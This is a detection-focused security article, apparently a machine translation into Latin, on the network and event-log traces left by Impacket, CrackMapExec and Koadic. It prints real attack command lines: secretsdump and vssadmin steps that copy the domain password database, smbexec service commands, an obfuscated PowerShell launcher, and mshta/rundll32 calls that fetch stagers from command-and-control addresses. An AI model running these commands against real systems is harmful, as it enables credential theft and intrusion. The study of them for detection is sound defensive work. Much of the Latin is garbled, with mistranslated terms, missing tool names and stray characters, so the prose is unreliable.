Numerus impetus in sectore corporato quotannis crescit: eg quam MMXVI et fine MMXVIII - quam superiore tempore. Inter eas ubi principale instrumentum operandi est systema Fenestra operandi. In 2017-2018, APT Dragonfly, APT28, impetus in regimen et instituta militaria in Europa, America Septentrionali et Arabia peracta. Et tria instrumenta ad hoc usi sumus. , ΠΈ . Eorum fons codicem apertum est et promptum in GitHub.
Notatu dignum est instrumenta haec non ad penetrationem initialem adhibita, sed ad impetum infrastructuram promovendam. Impugnatores illos diversos gradus oppugnationis sequuntur penetrationem perimetri. Hoc obiter difficile est deprehendere et saepe solum ope technologiae seu instrumenta quae patitur . Instrumenta varias functiones praebent, ab translatione fasciculorum ad commercium cum registro et mandatorum in machina remota exsequenda. Horum instrumentorum studium deduximus ad definiendas eorum retis activitatem.
Quod nobis opus est facere;
- Intellige quomodo instrumenta operis caesim. Exquirite quid oppugnatores opus est uti et quibus artibus uti possint.
- Invenies quod non deprehenditur per instrumenta securitatis informationis in primis oppugnationis gradibus. Investigationis tempus omitti potest, vel quia oppugnator est internus oppugnator, vel quia oppugnator foramen infrastructurae antea cognitae opprimit. Fieri potest ut totam suorum actuum catenam restituat, hinc desiderium motus ulterioris deprehendendi.
- Eliminate falsum positivis ex intrusione deprehensio instrumenta. Non est oblivisci nos, cum actiones quaedam ex sola exploratione deteguntur, frequentes errores esse possibilis. Plerumque in infrastructura satis multi modi sunt, indiscretae a legitimis, prima specie, ad quascumque informationes obtinendas.
Quid haec instrumenta oppugnatoribus dant? Si Impacket hoc est, tunc oppugnatores magnam bibliothecam modulorum recipiunt qui in diversis gradibus oppugnationis, qui post perimetrum fractum est, consequi possunt. Multa instrumenta Impacket modulorum interne utuntur - exempli gratia, Metasploit. Habet dcomexec et wmiexec pro remota executione mandati, secretsdump ad rationes acquirendas ex memoria quae ab Impacket additae sunt. Quam ob rem recta detectio actionis talis bibliothecae derivatorum detectionem obtinebit.
Non coincidunt creatores scripsisse "potestatem ab Impacket" de CrackMapExec (vel simpliciter CME). Praeterea CME paratam fecit functionem pro missionibus popularibus: Mimikatz ad obtinendum passwords vel hashes, exsecutionem meterpretis vel agentis Imperii ad remotis executionem, et in tabula sanguinaria.
Tertium instrumentum quod elegimus erat Koadic. Prope recens, in colloquio Piratica internationalis DEFCON 25 anno 2017 praesentatum est et ab accessu non norma distinguitur: per HTTP, Java Script et Microsoft Visual Scriptor Basic operatur (VBS). Accessus ad terram vivus dicitur: instrumentum utitur instrumento certarum clientium ac bibliothecarum in Fenestra structarum. Auctores appellant COM Imperii & Imperium, seu C3.
IMPACKET
Impacket functio amplissima est, ab exploratore intra AD et notitias colligendas ab internis MS SQL servientibus, ad technicas documentorum obtinendas: hoc est smb Nullam impetum, et obtinens fasciculi ntds.dit continens hashes tesserarum usoris a dominio moderatoris. Impacamentum etiam imperat remotis quattuor modis diversis utens: WMI, Windows Scheduler Service Management, DCOM, et SMB, et documentorum ad id faciendum requirit.
Secretsdump
Inspice secretsdump. Modulus hic est qui utrumque usorem machinis et domicilii moderatoris oppugnare potest. Adhiberi potest exempla memoriae areas LSA, SAM, SECURITAS, NTDS.dit, ut videri potest in diversis gradibus oppugnationis. Primus gradus in operatione moduli est authenticas per SMB, quae vel tesseram usoris vel Nullam utentis postulat ut automatice impetum detrahendi expleat. Postrema petitio ut aditus ad servitii Imperium Manager (SCM) accedat et aditum ad subcriptio per winreg protocollum recipiat, utens quod oppugnator notitias usurarum invenire potest et proventus per SMB consequi.
In Fig. 1 Videmus quam exacte cum protocollo winreg utendo, accessum obtineatur utens subcriptio clavem cum LSA. Ad hoc utere mandato DCERPC cum opcode 15 - OpenKey.
Renatus. 1. Aperiens subcriptio key usus est winreg protocol
Deinde, cum aditus ad clavem obtinetur, valores cum imperio SaveKey opcode salvantur 20. Impacket hoc modo specialissimo facit. Valores fasciculi servat cuius nomen est chorda 8 characteribus incertis appensis cum .tmp. Praeterea, ulterior fasciculi huius fasciculi via SMB ex indice System32 (Fig. 2) occurrit.
Renatus. 2. colui cultum obtinendum subcriptio key a remotis machina
Evenit ut talis actio in retiaculis per interrogationes detegi possit in ramis quibusdam registris utentibus protocollo winreg, nominibus specificis, mandatis et ordine eorum.
Cuius moduli etiam vestigia in Fenestra eventi stipitatis relinquit, ut facile deprehendas. Ut ex mandato
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCIn Fenestra Servo 2016 stipes sequentem clavem rerum seriem videbimus:
1 4624. β remotis Logon.
2. 5145. β accessum reprimendo jura remota ad winreg servitium.
3. 5145 - accessum fasciculi reprimendorum iura in directorio System32. Tabella nomen temere de quo supra dictum est.
4 4688. β processus creando cmd.exe, quod vssadmin immittit;
βC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 β processum cum mandato creandi ;
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 β processum cum mandato creandi ;
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 β processum cum mandato creandi ;
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Sicut instrumenta multa post-abusionem, Impacket modulos habet ad mandata exequenda remotius. Smbexec intendunt, quod testam in machina remota interactive mandatum praebet. Cuius moduli etiam authenticas per SMB requirit, vel tessera vel tessera Nullam. In Fig. In Figura 3 videmus exemplum qualiter tale instrumentum operatur, in hoc casu Administrator localis consoletur.
Renatus. 3. Interactive smbexec console
Primus gradus smbexec post authenticas est SCM cum imperio OpenSCManagerW aperire (15). Nota quaesitio est: campus MachineName DUMMY est.
Renatus. 4. Request aperire Service Imperium Manager
Deinde, servitium creatur utens imperio CreateServiceW (12). In casu smbexec, idem praeceptum constructionis logicae omni tempore videre possumus. In Fig. 5 viridis indicat incommutabile praeceptum ambitum, fulvum indicat invasorem quid possit mutare. Facile est videre nomen fasciculi exsecutabilis, directorii et outputi, mutari posse, reliqua vero multo difficilius est mutare sine perturbatione moduli Impacket logicam.
Renatus. 5 Request creare ministerium per Service Imperium Manager
Smbexec etiam vestigia manifesta in Fenestra eventus log relinquit. In Fenestra Servo 2016 stipes pro testudine interactive mandatum cum imperio ipconfig, sequentium rerum ordinem clavem videbimus:
1. 4697 β institutionem ministerii in machina victimae:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 β Creatio processus cmd.exe cum argumentis a puncto 1Β°.
3. 5145 - accessum reprimendo iura ad __output lima in indicem C$.
4. 4697 β institutionem ministerii in machina victimae.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 β Creatio processus cmd.exe cum argumentis a puncto 4Β°.
6. 5145 - accessum reprimendo iura ad __output lima in indicem C$.
Impacamentum est fundamentum progressionem instrumentorum oppugnationis. Omnes fere protocolla in Fenestra infrastructura sustinet et simul proprias notas habet. Hic certae petitiones winreg sunt, et usus SCM API cum formatione praecepti propria, et forma nominis tabella et SYSTEM32 communicant.
CRACKMAPEXEC
Instrumentum CME principaliter designatum est ad automate illas actiones exercitationis quas oppugnator habet ad progrediendum in retis. Permittit tibi operam dare in coniunctione cum notissimo agente Imperii et meterprete. CME occulte mandata facere obfuscare. Utens Bloodhound (investigationis separatum instrumentum), oppugnator potest automate inquisitionem sessionis administratoris activitatis dominii.
Bloodhound
Sanguis canis, quasi instrumentum standi, exploratoris progressi in retiaculis concedit. Notitias colligit de utentibus, machinis, coetibus, sessionibus et suppletur ut scriptura PowerShell vel fasciculi binarii. LDAP vel protocolla substructio notitias colligendas adhibentur. CME integratio moduli permittit Bloodhound in machina victimae deponi, currere et recipere notitias collectas post executionem, inde actiones in systematis automating ac minus notabiles facere. Testa graphica sanguinea praebet notitias collectas in graphs forma, quae te permittit invenire brevissimam viam ab oppugnatoris machina ad administratorem domain.
Renatus. 6. Bloodhound Interface
Currere in machinam victimae, modulus negotium conficit utendo ATSVC et SMB. ATSVC interfacies est ad operandum cum Fenestra Task Scheduler. CME utitur suo NetrJobAdd(1) munere ad operas creandas super reticulum. Exemplum quale CME mittit modulus in Fig. 7: Hoc mandatum est cmd.exe vocatio et obfuscata in forma argumentorum in forma XML.
Fig.7. Creando negotium per CME
Postquam negotium exsecutioni datum est, apparatus victimae ipsa sanguinis incipit, et hoc in negotiatione videri potest. Modulus notatur per LDAP queries ut vexillum coetus obtineat, indicem omnium machinarum et usorum in dominico, et informationem de activae usoris sessionibus per SRVSVC NetSessEnum petitionem obtinere.
Renatus. 8. Obtinens album sessionum activarum per SMB
Praeterea, deductis Bloodhound super machinam victimae cum audiendis paratibus, adiungitur eventus cum ID 4688 (processus creatio) et processus nomen. Β«C:WindowsSystem32cmd.exeΒ». Quae notabilia sunt line argumentis praecipimus;
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , β¦ , 40,41 )-jOIN'' ) "Enum_avproducts
Modulus enum_avproductorum valde interesting e parte functionis et exsecutionis. WMI permittit te lingua interrogationis WQL uti ut notitias ex variis Fenestra obiectis capias, quae essentialiter in hoc modulo CME utitur. Queries generat de AntiSpywareProduct et AntiΠirusProduct classes de instrumentorum tutela in machina victimae installed. Ut notitias necessarias obtineat, modulus spatii nominandi radicemSecuritatisCenter2 nectit, deinde interrogationem WQL gignit et responsionem accipit. In Fig. Figura 9 patet contenta petitionum et responsionum talium. In exemplo nostro Fenestra Defensoris inventa est.
Renatus. 9. Network actio moduli enum_avproducts
Saepe WMI audientes (Trace WMI-Activity), in quorum eventibus utiles informationes de WQL queries invenire potes, debilitari possunt. Si autem facultas est, si scriptum enum_avproductorum currendum est, eventus cum ID 11 salvabitur, nomen utentis, qui rogatum misit, nomenque in spatio nominali rootSecurityCenter2 continebit.
Singulae modulorum CME artificia sua habebant, specifica WQL quaesita sive creatio cuiusdam generis operis in schedula obfuscatione et actione sanguinis specificae in LDAP et SMB.
KOADIC
Praecipuum notae Koadic est usus JavaScript et VBScriptorum interpretum in Fenestra structi. In hoc sensu, sequitur viva inclinatio super terram, id est, nullas habet dependentias externas et utitur instrumentis Fenestrae normae. Hoc instrumentum est ad plenam Imperii & Imperium (CnC), quia post contagionem "inplantatio" in machina installatur, permittens coerceri. Talis machina, in terminologia Koadic, "zombie" appellatur. Si privilegia insufficiens sunt ad plenam operationem in latere victimae, Koadic facultas est utendi usoris Rationis Control bypass (UAC bypass) eas sublevare.
Renatus. 10. Koadic Testa
Hostia communicare debet cum servo Imperii & Imperii. Ad hoc faciendum, necesse est URI contactum antea praeparatum et corpus principale Koadic uno e scenicis utendo. In Fig. Figura 11 exemplum pro mshta scenici ostendit.
Renatus. 11. Initializing sessionem cum servo CnC
Ex responsione variabilis WS, manifestum fit executionem fieri per WScript. Shell, et variabiles STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPLORATIO continent notitias praecipuas de hodiernae sessionis parametris. Haec est prima par responsionis postulati in nexu HTTP cum servo CnC. Postulationes subsequentes directe pertinentes ad functionem vocati modulorum (inplantat). Omnes moduli Koadic solum in sessione activa cum CnC laborant.
Mimikatz
Sicut CME cum Bloodhound operatur, Koadic cum Mimikatz operatur in programmate separato et plures habet vias ad eam deducendam. Subter par responsionis postulatio est in Mimikatz deprimendo.
Renatus. 12. Translatio Mimikatz ad Koadic
Videre potes quomodo forma URI in rogatu mutata est. Nunc valorem continet pro variabilis csrf, quae moduli delecti respondet. Noli nomen eius auscultare; Omnes scimus CSRF aliter accipi solere. Responsum est idem agmen Koadic, cui ad Mimikatz codicem relatum est. Res magna est, ut in cardinis inspiciamus. Hic habemus bibliothecam Mimikatz descriptam in base64, a serialized .NET genus quod injiciet, et argumenta ad Mimikatz deducenda. Effectus exsecutio in retiaculis in textu perspicuo traducitur.
Renatus. 13. Ex currit Mimikatz in machina remota
Exec_cmd
Koadic etiam modulos habet, qui mandata remotius exequi possunt. Hic videbimus eandem URI generationis methodum & notas sid & csrf variabiles. In casu moduli exec_cmd, codice additur corpori, qui testudinem imperat capacem esse. Infra ostendetur tale codicem in responsione CnC servo HTTP contentum.
Renatus. 14. Implant codice exec_cmd
GAWTUUGCFI variabilis cum nota WS attributi ad supplicium requiritur. Ope, implantare testam vocat, duos ramos codicis processus β putamen.exec cum reditu e output datos amnis et concha sine reverti.
Koadic instrumentum typicum non est, sed artificia sua habet quibus in legitimo mercatu inveniri potest;
- peculiari formatione petitionum HTTP;
- usura winHttpRequests API,
- creando WScript.Shell objectum per ActiveXObject,
- magnum corpus exsecutabile.
Connexio initialis ab scaenicis initiatur, ut actio eius per fenestras eventus deprehendere possit. Nam mshta, hoc est eventus 4688, qui indicat processum creationis cum initio attributum;
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Dum Koadic currit, videre potes alios 4688 eventus cum attributis quae illam perfecte denotant;
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Inventiones
Vivens de terra inclinatio popularis inter scelestos lucratur. Instrumentis et machinationibus in Fenestra pro necessitatibus suis constructis utuntur. Videmus instrumenta popularia Koadic, CrackMapExec et Impacket hoc principium magis magisque in relationibus APT apparent. Numerus uncinorum in GitHub ad haec instrumenta etiam crescit et novae apparent (iam circiter mille nunc sunt). Tenor favoris consequitur suam simplicitatem: oppugnatores instrumenta tertia factionis non indigent, in machinis victimarum iam sunt et eas cautionibus securitatis praeteritis adiuvant. Nos communicationem retis inspicere studemus: unumquodque instrumentum supra descriptum relinquit sua vestigia in retis negotiationis; singillatim studium eorum nobis docere productum permisit eas deprehendere, quae tandem adiuvat ad totam catenam cyberium incidentes investigandas.
auctores:
- Antonius Tyurin, Caput Periti Services Department, PT Peritus Securitatis Centre, positivus Technologies
- Egor Podmokov, peritus, PT Peritus Securitatis Centri, positivus Technologies
Source: www.habr.com